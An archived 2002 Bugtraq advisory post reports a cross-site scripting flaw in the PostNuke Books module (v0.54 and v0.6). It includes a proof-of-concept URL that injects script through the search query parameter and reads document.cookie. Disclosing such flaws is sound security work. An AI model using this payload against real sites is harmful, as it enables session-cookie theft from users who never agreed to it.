NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2002-10

From: Pistone (jorgep_at_spdps.com.ar)
Date: Wed Oct 02 2002 - 19:47:08 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- ----------------------------------------------------
Class : input Validation Error

Risk : Due to the simplicity of the attack and the number of sites
that run module books the risk is classified as Medium to
High.

URL: http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64)
This Books module version v0.6 is running as a Rogue (PN 0.7)
- ----------------------------------------------------

Exploit:

http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>

- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------

Salu2

Pistone
- - --------
http://www.gauchohack.com.ar
http://www.hackindex.org

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]